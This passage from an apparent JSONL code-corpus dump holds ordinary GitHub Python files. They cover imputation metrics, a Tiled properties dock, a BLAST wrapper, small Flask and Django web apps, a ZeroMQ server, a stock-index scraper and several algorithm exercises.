np.empty(shape=(biv_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_prob_impute = {}\n mar_var_impute = {}\n biv_prob_impute = {}\n biv_var_impute = {}\n\n\nif num_index:\n data_num_pop_df = data_df.iloc[:, num_index]\n if save_name != \"house2\":\n data_bin_pop_ls, bins = zip(*data_num_pop_df.apply(pd.qcut, 0, q=8, labels = False, retbins=True, duplicates=\"drop\"))\n data_bin_pop_df = 
pd.concat(data_bin_pop_ls, axis=1)\n else:\n bins = house_bins\n data_bin_pop_df = get_bins_from_numerical(data_num_pop_df, house_bins)\n # get all possible levels\n bin_all_levels = [np.unique(x) for x in data_bin_pop_df.values.T]\n bin_all_levels_dict = dict(zip(data_df.columns[num_index], bin_all_levels))\n # population estimands\n mar_bin_Q, mar_bin_Q_var = marginal_estimands(data_bin_pop_df, bin_all_levels_dict)\n biv_bin_Q, biv_bin_Q_var = bivariate_estimands(data_bin_pop_df, bin_all_levels_dict)\n # qualified index\n mar_bin_index = (mar_bin_Q * no > 10) & ((1 - mar_bin_Q) * no > 10)\n biv_bin_index = (biv_bin_Q * no > 10) & ((1 - biv_bin_Q) * no > 10)\n # performance metrics\n mar_bin_qhat = np.empty(shape=(mar_bin_Q.shape[0], num_samples))\n mar_bin_qhat_var = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples))\n biv_bin_qhat = np.empty(shape=(biv_bin_Q.shape[0], num_samples))\n biv_bin_qhat_var = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples))\n # initial imputed metrics\n mar_bin_prob_impute = {}\n mar_bin_var_impute = {}\n biv_bin_prob_impute = {}\n biv_bin_var_impute = {}\n\nmse = {}\n\nfor model_name in model_names:\n if cat_index:\n mar_prob_impute[model_name] = np.empty(shape=(mar_Q.shape[0], num_samples, num_imputations))\n mar_var_impute[model_name] = np.empty(shape=(mar_Q_var.shape[0], num_samples, num_imputations))\n biv_prob_impute[model_name] = np.empty(shape=(biv_Q.shape[0], num_samples, num_imputations))\n biv_var_impute[model_name] = np.empty(shape=(biv_Q_var.shape[0], num_samples, num_imputations))\n if num_index:\n mar_bin_prob_impute[model_name] = np.empty(shape=(mar_bin_Q.shape[0], num_samples, num_imputations))\n mar_bin_var_impute[model_name] = np.empty(shape=(mar_bin_Q_var.shape[0], num_samples, num_imputations))\n biv_bin_prob_impute[model_name] = np.empty(shape=(biv_bin_Q.shape[0], num_samples, num_imputations))\n biv_bin_var_impute[model_name] = np.empty(shape=(biv_bin_Q_var.shape[0], num_samples, num_imputations))\n\n # acc[model_name] = []\n mse[model_name] = []\n\nfor i in range(num_samples):\n # load samples\n data_i = np.loadtxt('../samples/{}/complete/sample_{}.csv'.format(save_name, i),\n delimiter=\",\").astype(np.float32)\n data_miss_i = np.loadtxt('../samples/{}/{}/sample_{}.csv'.format(save_name, miss_mechanism, i),\n delimiter=\",\").astype(np.float32)\n data_m = 1 - np.isnan(data_miss_i).astype(np.float32)\n # seperate categorical variables and numerical variables\n if cat_index:\n data_cat = data_i[:, cat_index]\n data_m_cat = data_m[:, cat_index]\n data_cat_df = pd.DataFrame(data=data_cat,\n index=list(range(data_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # marginal prob and bivariate prob before introduce missingness\n mar_qhat[:, i], mar_qhat_var[:, i] = marginal_estimands(data_cat_df, all_levels_dict)\n biv_qhat[:, i], biv_qhat_var[:, i] = bivariate_estimands(data_cat_df, all_levels_dict)\n if num_index:\n data_num = data_i[:, num_index]\n data_m_num = data_m[:, num_index]\n data_num_df = pd.DataFrame(data=data_num,\n index=list(range(data_num.shape[0])),\n columns=data_df.columns[num_index])\n data_bin_df = get_bins_from_numerical(data_num_df, bins)\n # marginal prob and bivariate prob before introduce missingness\n mar_bin_qhat[:, i], mar_bin_qhat_var[:, i] = marginal_estimands(data_bin_df, bin_all_levels_dict)\n biv_bin_qhat[:, i], biv_bin_qhat_var[:, i] = bivariate_estimands(data_bin_df, bin_all_levels_dict)\n\n for model_name in model_names:\n print(\"{}th sample, model: {}\".format(i, model_name))\n for l in 
range(num_imputations):\n # loading imputations\n if model_name == \"gain\" or model_name == \"mida\":\n data_imputed = np.loadtxt('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l),delimiter=\",\").astype (np.float32)\n if model_name == \"cart\" or model_name ==\"rf\":\n data_imputed = pd.read_csv('../results/{}/{}/{}/imputed_{}_{}.csv'.format(save_name, miss_mechanism, model_name, i, l)).values.astype(np.float32)\n # report accuracy\n mse[model_name].append(rmse_loss(data_i, data_imputed, data_m))\n # seperate categorical variables an d numerical variables\n if cat_index:\n imputed_cat = data_imputed[:, cat_index]\n imputed_cat_df = pd.DataFrame(data=imputed_cat,\n index=list(range(imputed_cat.shape[0])),\n columns=data_df.columns[cat_index])\n # get imputed marginal prob and biviate prob for ith sample\n mar_prob_impute[model_name][:, i, l], mar_var_impute[model_name][:, i, l] = marginal_estimands(\n imputed_cat_df, all_levels_dict)\n biv_prob_impute[model_name][:, i, l], biv_var_impute[model_name][:, i, l] = bivariate_estimands(\n imputed_cat_df, all_levels_dict)\n if num_index:\n imputed_num = data_imputed[:, num_index]\n imputed_num_df = pd.DataFrame(data=imputed_num,\n index=list(range(imputed_num.shape[0])),\n columns=data_df.columns[num_index])\n imputed_bin_df = get_bins_from_numerical(imputed_num_df, bins)\n # get imputed marginal prob and biviate prob for ith sample\n mar_bin_prob_impute[model_name][:, i, l], mar_bin_var_impute[model_name][:, i, l] = marginal_estimands(imputed_bin_df, bin_all_levels_dict)\n biv_bin_prob_impute[model_name][:, i, l], biv_bin_var_impute[model_name][:, i, l] = bivariate_estimands(imputed_bin_df, bin_all_levels_dict)\n pass\n pass\n pass\n\n# save estimands\nsave_path = \"../metrics/{}/{}\".format(save_name, miss_mechanism)\npathlib.Path(save_path).mkdir(parents=True, exist_ok=True)\nif cat_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_Q\"), mar_Q)\n np.save(os.path.join(save_path, \"mar_Q_var\"), mar_Q_var)\n np.save(os.path.join(save_path, \"biv_Q\"), biv_Q)\n np.save(os.path.join(save_path, \"biv_Q_var\"), biv_Q_var)\n # premiss estimands\n np.save(os.path.join(save_path, \"mar_qhat\"), mar_qhat)\n np.save(os.path.join(save_path, \"mar_qhat_var\"), mar_qhat_var)\n np.save(os.path.join(save_path, \"biv_qhat\"), biv_qhat)\n np.save(os.path.join(save_path, \"biv_qhat_var\"), biv_qhat_var)\n # imputed estimands\n np.save(os.path.join(save_path, \"mar_prob_impute\"), mar_prob_impute)\n np.save(os.path.join(save_path, \"mar_var_impute\"), mar_var_impute)\n np.save(os.path.join(save_path, \"biv_prob_impute\"), biv_prob_impute)\n np.save(os.path.join(save_path, \"biv_var_impute\"), biv_var_impute)\nif num_index:\n # population estimands\n np.save(os.path.join(save_path, \"mar_bin_Q\"), mar_bin_Q)\n np.save(os.path.join(save_path, \"mar_bin_Q_var\"), mar_bin_Q_var)\n np.save(os.path.join(save_path, \"biv_bin_Q\"), biv_bin_Q)\n np.save(os.path.join(save_path, \"biv_bin_Q_var\"), biv_bin_Q_var)\n # performance metrics\n np.save(os.path.join(save_path, \"mar_bin_qhat\"), mar_bin_qhat)\n np.save(os.path.join(save_path, \"mar_bin_qhat_var\"), mar_bin_qhat_var)\n np.save(os.path.join(save_path, \"biv_bin_qhat\"), biv_bin_qhat)\n np.save(os.path.join(save_path, \"biv_bin_qhat_var\"), biv_bin_qhat_var)\n # initial imputed metrics\n np.save(os.path.join(save_path, \"mar_bin_prob_impute\"), mar_bin_prob_impute)\n np.save(os.path.join(save_path, \"mar_bin_var_impute\"), mar_bin_var_impute)\n 
np.save(os.path.join(save_path, \"biv_bin_prob_impute\"), biv_bin_prob_impute)\n np.save(os.path.join(save_path, \"biv_bin_var_impute\"), biv_bin_var_impute)\n\nnp.save(os.path.join(save_path, \"mse\"), mse)","repo_name":"zhenhua-wang/MissingData_DL","sub_path":"evaluation/calculate_estimands.py","file_name":"calculate_estimands.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"33043266078","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\nroot = [[] for _ in range(n+1)]\r\nvisited = [False for _ in range(n+1)]\r\ncount = 0\r\n\r\n\r\nfor _ in range(m):\r\n u, v = map(int, input().split())\r\n \r\n root[u].append(v)\r\n root[v].append(u)\r\n \r\n\r\n\r\ndef DFS(now):\r\n visited[now] = True\r\n for i in root[now]:\r\n if not visited[i]:\r\n DFS(i)\r\n \r\nfor i in range(1, n+1):\r\n if not visited[i]:\r\n count += 1\r\n DFS(i)\r\n \r\nprint(count)\r\n \r\n\r\n","repo_name":"MiniMini-On/Algorithm","sub_path":"백준/Silver/11724. 연결 요소의 개수/연결 요소의 개수.py","file_name":"연결 요소의 개수.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37866282748","text":"from utils import Utils\nfrom object import Object\nfrom pyqtcore import QString\nfrom propertybrowser import PropertyBrowser\nfrom documentmanager import DocumentManager\nfrom changeproperties import SetProperty, RemoveProperty, RenameProperty\nfrom PyQt5.QtCore import (\n Qt,\n QSize,\n QEvent\n)\nfrom PyQt5.QtGui import (\n QIcon,\n QKeySequence\n)\nfrom PyQt5.QtWidgets import (\n QWidget,\n QVBoxLayout,\n QToolBar,\n QLineEdit, \n QInputDialog,\n QAction,\n QDockWidget\n)\ndef isExternal(object):\n if (not object):\n return False\n x = object.typeId()\n if x==Object.TilesetType:\n return object.isExternal()\n elif x==Object.TileType:\n return object.tileset().isExternal()\n elif x==Object.TerrainType:\n return object.tileset().isExternal()\n else:\n return False\n\nclass PropertiesDock(QDockWidget):\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.mMapDocument = None\n self.mPropertyBrowser = PropertyBrowser()\n\n self.setObjectName(\"propertiesDock\")\n self.mActionAddProperty = QAction(self)\n self.mActionAddProperty.setEnabled(False)\n self.mActionAddProperty.setIcon(QIcon(\":/images/16x16/add.png\"))\n self.mActionAddProperty.triggered.connect(self.addProperty)\n self.mActionRemoveProperty = QAction(self)\n self.mActionRemoveProperty.setEnabled(False)\n self.mActionRemoveProperty.setIcon(QIcon(\":/images/16x16/remove.png\"))\n self.mActionRemoveProperty.triggered.connect(self.removeProperty)\n self.mActionRenameProperty = QAction(self)\n self.mActionRenameProperty.setEnabled(False)\n self.mActionRenameProperty.setIcon(QIcon(\":/images/16x16/rename.png\"))\n self.mActionRenameProperty.triggered.connect(self.renameProperty)\n Utils.setThemeIcon(self.mActionAddProperty, \"add\")\n Utils.setThemeIcon(self.mActionRemoveProperty, \"remove\")\n Utils.setThemeIcon(self.mActionRenameProperty, \"rename\")\n toolBar = QToolBar()\n toolBar.setFloatable(False)\n toolBar.setMovable(False)\n toolBar.setIconSize(QSize(16, 16))\n toolBar.addAction(self.mActionAddProperty)\n toolBar.addAction(self.mActionRemoveProperty)\n toolBar.addAction(self.mActionRenameProperty)\n widget = QWidget(self)\n layout = QVBoxLayout(widget)\n layout.setContentsMargins(5, 5, 
5, 5)\n layout.setSpacing(0)\n layout.addWidget(self.mPropertyBrowser)\n layout.addWidget(toolBar)\n widget.setLayout(layout)\n self.setWidget(widget)\n manager = DocumentManager.instance()\n manager.currentDocumentChanged.connect(self.mapDocumentChanged)\n self.mPropertyBrowser.currentItemChangedSignal.connect(self.currentItemChanged)\n self.retranslateUi()\n\n def bringToFront(self):\n self.show()\n self.raise_()\n self.mPropertyBrowser.setFocus()\n\n def event(self, event):\n x = event.type()\n if x==QEvent.KeyPress or x==QEvent.ShortcutOverride:\n keyEvent = event\n if (keyEvent.matches(QKeySequence.Delete) or keyEvent.key() == Qt.Key_Backspace):\n if event.type() == QEvent.KeyPress:\n self.removeProperty()\n event.accept()\n return True\n elif x==QEvent.LanguageChange:\n self.retranslateUi()\n else:\n pass\n\n return super().event(event)\n\n def mapDocumentChanged(self, mapDocument):\n if type(mapDocument)==list:\n mapDocument = mapDocument[0]\n if (self.mMapDocument):\n self.mMapDocument.disconnect()\n self.mMapDocument = mapDocument\n self.mPropertyBrowser.setMapDocument(mapDocument)\n if (mapDocument):\n mapDocument.currentObjectChanged.connect(self.currentObjectChanged)\n mapDocument.tilesetFileNameChanged.connect(self.tilesetFileNameChanged)\n mapDocument.editCurrentObject.connect(self.bringToFront)\n self.currentObjectChanged(mapDocument.currentObject())\n else:\n self.currentObjectChanged(None)\n\n def currentObjectChanged(self, object):\n if type(object)==list and len(object)>0:\n object = object[0]\n self.mPropertyBrowser.setObject(object)\n enabled = object != None and not isExternal(object)\n self.mPropertyBrowser.setEnabled(enabled)\n self.mActionAddProperty.setEnabled(enabled)\n\n def currentItemChanged(self, item):\n isCustomProperty = self.mPropertyBrowser.isCustomPropertyItem(item)\n external = isExternal(self.mPropertyBrowser.object())\n self.mActionRemoveProperty.setEnabled(isCustomProperty and not external)\n self.mActionRenameProperty.setEnabled(isCustomProperty and not external)\n\n def tilesetFileNameChanged(self, tileset):\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n update = False\n x = object.typeId()\n if x==Object.TilesetType:\n update = object == tileset\n elif x==Object.TileType:\n update = object.tileset() == tileset\n elif x==Object.TerrainType:\n update = object.tileset() == tileset\n else:\n pass\n\n if (update):\n self.currentObjectChanged(object)\n self.currentItemChanged(self.mPropertyBrowser.currentItem())\n\n def addProperty(self, *args):\n l = len(args)\n if l==0:\n property, ok = QInputDialog.getText(self.mPropertyBrowser, self.tr(\"Add Property\"),\n self.tr(\"Name:\"), QLineEdit.Normal,'')\n if ok:\n self.addProperty(property)\n elif l==1:\n arg1 = args[0]\n tp = type(arg1)\n if tp==bool:\n self.addProperty()\n elif tp in [str, QString]:\n name = arg1\n if name=='':\n return\n object = self.mMapDocument.currentObject()\n if (not object):\n return\n if (not object.hasProperty(name)):\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(SetProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name, QString()))\n\n self.mPropertyBrowser.editCustomProperty(name)\n\n def removeProperty(self):\n item = self.mPropertyBrowser.currentItem()\n object = self.mMapDocument.currentObject()\n if (not item or not object):\n return\n name = item.property().propertyName()\n undoStack = self.mMapDocument.undoStack()\n items = item.parent().children()\n if items.count() > 1:\n currentItemIndex = 
items.indexOf(item)\n if item == items.last():\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex - 1))\n else:\n self.mPropertyBrowser.setCurrentItem(items.at(currentItemIndex + 1))\n\n undoStack.push(RemoveProperty(self.mMapDocument, self.mMapDocument.currentObjects(), name))\n\n def renameProperty(self, *args):\n l = len(args)\n if l==0:\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n dialog = QInputDialog(self.mPropertyBrowser)\n dialog.setInputMode(QInputDialog.TextInput)\n dialog.setLabelText(self.tr(\"Name:\"))\n dialog.setTextValue(oldName)\n dialog.setWindowTitle(self.tr(\"Rename Property\"))\n dialog.open(self.renameProperty)\n elif l==1:\n name = args[0]\n if (name.isEmpty()):\n return\n item = self.mPropertyBrowser.currentItem()\n if (not item):\n return\n oldName = item.property().propertyName()\n if (oldName == name):\n return\n undoStack = self.mMapDocument.undoStack()\n undoStack.push(RenameProperty(self.mMapDocument, self.mMapDocument.currentObjects(), oldName, name))\n\n def retranslateUi(self):\n self.setWindowTitle(self.tr(\"Properties\"))\n self.mActionAddProperty.setText(self.tr(\"Add Property\"))\n self.mActionRemoveProperty.setText(self.tr(\"Remove Property\"))\n self.mActionRenameProperty.setText(self.tr(\"Rename Property\"))\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/propertiesdock.py","file_name":"propertiesdock.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5670186536","text":"\nimport config\n\nfrom pprint import pprint\n\nimport blast\nimport ranges\n\n\ndef locate_sequence(seq, genome, check_uniq=True, evalue_threshold=1e-40,\n hsp_align_len_threshold=None, hsp_identity_threshold=None):\n\n blast_dir = config.CACHE_DIR / 'blast'\n blast_dir.mkdir(exist_ok=True)\n\n res = blast.prepare_blast_db(genome, blast_dir, db_type='nucl',\n skip_if_exists=True)\n db_path = res['db_path']\n\n res = blast.blast_seqs([{'seq': seq, 'name': 'seq'}],\n db_path, blast_program='blastn',\n evalue_threshold=evalue_threshold)\n\n subjects = list(res['seq'].keys())\n if check_uniq:\n if len(subjects) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n locations = []\n for subject, hsps in res['seq'].items():\n hsps = blast.filter_hsps_by_align_len(hsps, hsp_align_len_threshold)\n hsps = blast.filter_hsps_by_identity(hsps, hsp_identity_threshold)\n\n subject_ranges = []\n for hsp in hsps:\n subject_ranges.append({'chrom': subject,\n 'start': hsp['subject_start'],\n 'end': hsp['subject_end'],\n 'strand': '+' if hsp['subject_strand'] == 1 else '-'})\n subject_ranges = ranges.merge_ranges(subject_ranges)\n for range_ in subject_ranges:\n locations.append({'subject': subject,\n 'start': range_['start'],\n 'end': range_['end'],\n 'strand': range_['strand']\n })\n\n if check_uniq:\n if len(locations) > 1:\n raise RuntimeError('Sequence found in several subjects')\n\n return locations\n\n\nif __name__ == '__main__':\n seq = 'AGACAAGTGGTGAAGAAKAAGATGATATGCAGCAATGCATTTCACCACTTTATATAGCATGGAGTGGATTTCTCCACCTCATTTAATAGTATGAAGTGGAGGCAGCCCCCCTCTACACCTGTCCACTAAGGCCAGCCCACAATCTGATCCCTTTTAATTTTTGCCTTGAGTGGTGGGGCCCATTGGATTAAATCAATCCAAATTAGCCAC'\n locations = locate_sequence(seq, config.TOMATO_GENOME_FASTA, check_uniq=False,\n hsp_align_len_threshold=70, hsp_identity_threshold=95)\n 
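# locations: a list of dicts of the form {'subject': ..., 'start': ..., 'end': ..., 'strand': '+' or '-'}, one entry per merged HSP range built by locate_sequence() above\n    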
pprint(locations)","repo_name":"bioinfcomav/tomato_haplotype_paper_old","sub_path":"src/locate_seq_using_blast.py","file_name":"locate_seq_using_blast.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"226250619","text":"# coding: utf-8\nfrom flask import Flask\nfrom flask import render_template\n\nimport gspread\nfrom oauth2client.client import SignedJwtAssertionCredentials\nimport json\n\nimport urllib\nimport urllib2\nfrom BeautifulSoup import BeautifulSoup\nimport random\nfrom flask import request\nfrom flask.ext.cache import Cache\n\nfrom save_historians import *\nimport time\nimport random\n\napp = Flask(__name__)\napp.config['CACHE_TYPE'] = 'simple'\napp.cache = Cache(app, config={\n 'CACHE_TYPE': 'filesystem',\n 'CACHE_DIR': 'cache-dir',\n 'CACHE_DEFAULT_TIMEOUT': 922337203685477580,\n 'CACHE_THRESHOLD': 922337203685477580\n })\n\n@app.route(\"/\")\ndef main():\n\treturn 'nginx is running'\n\n@app.route(\"/historyofgreats\")\ndef historyofgreats():\n\tcached = app.cache.get('main')\n\tif cached:\n\t\treturn cached\n\tworksheet = setWorkSheet()\n\tdata = worksheet.get_all_values()\n\tresult = render_template('graphs.html',data=data)\n\tapp.cache.set('main', result)\n\treturn result\n\n@app.route(\"/claim\", methods=[\"POST\"])\ndef claim():\n\tclaimtype = request.form.get('claimtype')\n\tmsg = request.form.get('msg')\n\tresult = saveClaim(claimtype,msg)\n\treturn json.dumps(result)\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add():\n\tname = request.form.get('name')\n\tresult = addHistory(name)\n\tif result['resultCode'] == '1':\n\t\tapp.cache.delete('main')\n\treturn json.dumps(result)\n\n#Flush Cache\n@app.route(\"/cache_flush/<key_name>\")\ndef cache_flush(key_name):\n\tapp.cache.delete(key_name)\n\treturn 'Done: [ ' + key_name + ' ] is Deleted'\n\n#test\n@app.route(\"/test/<name>\")\ndef test(name):\n\tresult = getinfoWiki(name)\n\treturn json.dumps(result)\n\nif __name__ == \"__main__\":\n \tapp.run('0.0.0.0',8080,debug=True)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bumkyulee/historyofgreats","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36174493238","text":"from django.http import HttpResponse, Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom datetime import datetime\nfrom blog.models import Article\nfrom .forms import ContactForm, ArticleForm\n\n\ndef accueil(request):\n \"\"\" Afficher tous les articles de notre blog \"\"\"\n articles = Article.objects.all() # Nous sélectionnons tous nos articles\n return render(request, 'blog/accueil.html', {'derniers_articles': articles})\n\n\ndef lire(request, id, slug):\n article = get_object_or_404(Article, id=id, slug=slug)\n return render(request, 'blog/lire.html', {'article': article})\n\n\ndef home(request):\n \"\"\" Exemple de page non valide au niveau HTML pour que l'exemple soit concis \"\"\"\n # return HttpResponse(\"\"\"\n # <html><body><h1>Bienvenue sur mon blog !</h1>\n # <p>Les crêpes bretonnes ça tue des mouettes en plein vol !</p></body></html>\n # \"\"\")\n couleurs = {\n '#FF0000': 'rouge',\n '#ED7F10': 'orange',\n '#FFFF00': 'jaune',\n '#00FF00': 'vert',\n '#0000FF': 'bleu',\n '#4B0082': 'indigo',\n '#660099': 'violet',\n }\n return render(request, 'blog/home.html', {'date': datetime.now(), 'pseudo': \"Test\", 'couleurs': 
\"\"})\n\n\ndef view_article(request, id_article):\n # Si l'ID est supérieur à 100, nous considérons que l'article n'existe pas\n if id_article > 100:\n return redirect(list_articles, month=12, year=2010)\n\n return render(request, 'blog/article.html', {'id_article': id_article})\n\n\ndef list_articles_by_tag(request, tag):\n return HttpResponse(\n \"<html><body>Vous avez demandé l'article tag {0} !</body></html>\".format(tag)\n )\n\n\ndef list_articles(request, month, year):\n if month == '12' and year == '1900':\n return redirect(home)\n\n return HttpResponse(\n \"<html><body>Vous avez demandé l'article du mois {0} année {1} !</body></html>\".format(month, year)\n )\n\n\ndef addition(request, nombre1, nombre2):\n total = nombre1 + nombre2\n\n # Retourne nombre1, nombre2 et la somme des deux au tpl\n return render(request, 'blog/addition.html', locals())\n\n\ndef pourcentage(request, nombre1, nombre2):\n result = nombre1 / nombre2 * 100\n\n return render(request, 'blog/pourcentage.html', locals())\n\n\ndef contact(request):\n # Construire le formulaire, soit avec les données postées,\n # soit vide si l'utilisateur accède pour la première fois\n # à la page.\n form = ContactForm(request.POST or None)\n # Nous vérifions que les données envoyées sont valides\n # Cette méthode renvoie False s'il n'y a pas de données\n # dans le formulaire ou qu'il contient des erreurs.\n if form.is_valid():\n # Ici nous pouvons traiter les données du formulaire\n sujet = form.cleaned_data['sujet']\n message = form.cleaned_data['message']\n envoyeur = form.cleaned_data['envoyeur']\n renvoi = form.cleaned_data['renvoi']\n\n # Nous pourrions ici envoyer l'e-mail grâce aux données\n # que nous venons de récupérer\n envoi = True\n\n # Quoiqu'il arrive, on affiche la page du formulaire.\n return render(request, 'blog/contact.html', locals())\n\n\ndef article_new(request):\n article = Article()\n form = ArticleForm(request.POST, instance=article)\n if form.is_valid():\n form.save()\n\n # Quoiqu'il arrive, on affiche la page du formulaire.\n return render(request, 'blog/article.html', locals())\n","repo_name":"tiagfernandes/crepes_bretonnes","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71060918088","text":"import sys\nimport itertools\nimport math\nimport collections\nimport functools\n\ndef inputInts():\n return list(map(int, input().split()))\n\ndef cost(L, N):\n res = 0\n for i in range(N-1):\n j = L.index(min(L[i:]))\n res += j - i + 1\n L[i:j+1] = L[i:j+1][::-1]\n return res\n\nT = int(input())\nfor testId in range(T):\n N = int(input())\n L = inputInts()\n\n print(\"Case #{:d}: {:d}\".format(testId+1, cost(L, N)))\n","repo_name":"AurelC2G/practice","sub_path":"googlecodejam/2021/0-Qualif/Reversort/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27069677227","text":"import zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.connect(\"tcp://localhost:5560\")\n\nwhile True:\n msg = socket.recv()\n msg = msg.decode('utf-8')\n print(\"Received request: %s\" % msg)\n 
socket.send(b\"World\")\n","repo_name":"kawing-chiu/exc","sub_path":"Python/16pyzmq/simple_examples/extended_pub_sub_server.py","file_name":"extended_pub_sub_server.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20532280521","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution(object):\n def searchByIndex(self, head, index):\n if head is None or index < 0:\n return None\n for _ in range(index):\n head = head.next\n if not head:\n return None\n return head\n \n def deleteNode(self, head, index):\n \"\"\"\n input: ListNode head, int index, int value\n return: ListNode\n \"\"\"\n dummy = ListNode(None)\n dummy.next = head\n delete_place = self.searchByIndex(dummy, index)\n if not delete_place or not delete_place.next:\n return dummy.next\n delete_place.next = delete_place.next.next\n return dummy.next","repo_name":"XinheLIU/Coding-Interview","sub_path":"Python/Data Structure/Linear List/Linked List/Operations/Templates/Delete Node At Index.py","file_name":"Delete Node At Index.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34756061709","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bacster', '0005_bacitem_bac_id'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='bacitem',\n old_name='bac_id',\n new_name='bacid',\n ),\n ]\n","repo_name":"mikkki/web_tool","sub_path":"public/bacster_refactor/bacster/migrations/0006_auto_20150420_1949.py","file_name":"0006_auto_20150420_1949.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15698549668","text":"from __future__ import print_function\n\ndef main():\n #membuat prompt untuk tipe data ineger\n bilanganbulat = int(raw_input(\"maskkan bilangan bulat: \"))\n\n #menggunakan variabel untuk melakukan perhitungan\n hasil = bilanganbulat + 1\n\n #menampilkan nilai variabel\n print(\"Bilangan yang dimasukkan adalah %d\" % bilanganbulat)\n print(\"%d + 1 = %d\" % (bilanganbulat, hasil))\n\nif __name__ == \"__main__\":\n main()","repo_name":"dhanyn10/python","sub_path":"bab-2/input-integer.py","file_name":"input-integer.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34393767132","text":"import requests\n\nfrom bs4 import BeautifulSoup\nfrom db import save_companies\n\nindex_url = \"http://bvmf.bmfbovespa.com.br/indices/ResumoCarteiraTeorica.aspx?Indice=IBOV&idioma=pt-br\"\n\n\nasync def fetch_portfolio(loop):\n \"\"\" Fetch portfolio on BMF bovespa website \"\"\"\n\n # Async web request\n response = await loop.run_in_executor(None, requests.get, index_url)\n index_members = fetch_portfolio_composition(response.text)\n\n # Save companies in the database\n await save_companies(index_members)\n\n\ndef fetch_portfolio_composition(content):\n \"\"\" Fetch IBOVESPA portfolio index composition, basic data from main page. 
\"\"\"\n index_members = {}\n data = BeautifulSoup(content, \"lxml\")\n\n for tr in data.find_all(\"tr\"):\n try:\n col_vle = [member.text.strip() for member in tr.find_all(\"span\")]\n col_desc = [\"name\", \"type\", \"qty\", \"part\"]\n symbol = col_vle.pop(0)\n\n for i, (value, desc) in enumerate(zip(col_vle, col_desc)):\n if i == 0:\n if not symbol.startswith(\"Quantidade\"):\n index_members[symbol] = {}\n\n index_members[symbol][desc] = value\n except (KeyError, ValueError, IndexError) as e:\n print(\"WARN: could not be able to parse data {}\".format(e))\n continue\n\n return index_members\n","repo_name":"knabben/bov-stream","sub_path":"scrapper/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"32851288845","text":"n=int(input())\nm=int(input())\nA=list()\nfor _ in range(0,n):\n i=int(input())\n A.append(i)\nm1=max(A)\nm2=min(A)\na2=m+m1\nk=m\nfor i in range(0,n):\n if(k<=0):\n break\n elif(A[i]<m1):\n k-=(m1-A[i])\n A[i]+=(m1-A[i])\n else:\n continue\na1=max(A)\nif(k<=0):\n pass\n print(a1,a2)\nelse:\n q=k//n\n r=k%n\n if(r==0):\n a1+=q\n else:\n a1+=q+1\n print(a1,a2)\n\n \n\n","repo_name":"Pulkit3108/Codeforces-Problems","sub_path":"Round#510(Div. 2)A.py","file_name":"Round#510(Div. 2)A.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73810040329","text":"\"\"\"\nCreated on Mon Nov 14 16:38:57 2022\n\n@author: micha\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nfrom sklearn.model_selection import train_test_split\n\n\nimport os\ncwd = 